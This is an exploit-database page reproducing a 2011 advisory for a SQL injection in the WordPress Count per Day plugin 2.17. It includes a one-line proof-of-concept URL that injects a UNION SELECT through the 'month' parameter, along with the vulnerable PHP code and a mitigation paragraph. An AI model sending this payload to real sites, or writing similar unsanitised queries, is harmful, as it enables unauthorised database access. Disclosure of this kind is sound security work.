header-logo
Suggest Exploit
vendor:
Count per Day
by:
Miroslav Stampar
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Count per Day
Affected Version From: 2.17
Affected Version To: 2.17
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:count_per_day:2.17
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'month' parameter of the 'notes.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the context of the application. This can allow the attacker to bypass authentication and gain access to the application data.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. All input data should be validated and filtered, and special characters should be escaped or removed.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip
# Version: 2.17 (tested)
# Note: Authors done one of dirtiest things I've seen in a while :)
#       I've warned them 2 weeks ago about the vulnerability
#       They've silently updated the affected v2.17 like nothing happened
#       No mention of "security" fix in Changelog

---
PoC
---
http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20

---------------
Vulnerable code
---------------
if ( isset($_POST['month']) )
	$month = $_POST['month']; // they've put (int) here
else if ( isset($_GET['month']) )
	$month = $_GET['month'];  // they've put (int) here
else	
	$month = date_i18n('m');
...
$where = '';
if ( $month )
	$where .= " AND MONTH(date) = $month "; 
if ( $year )
	$where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);

Navigation

Suggest Exploit

Services By CQR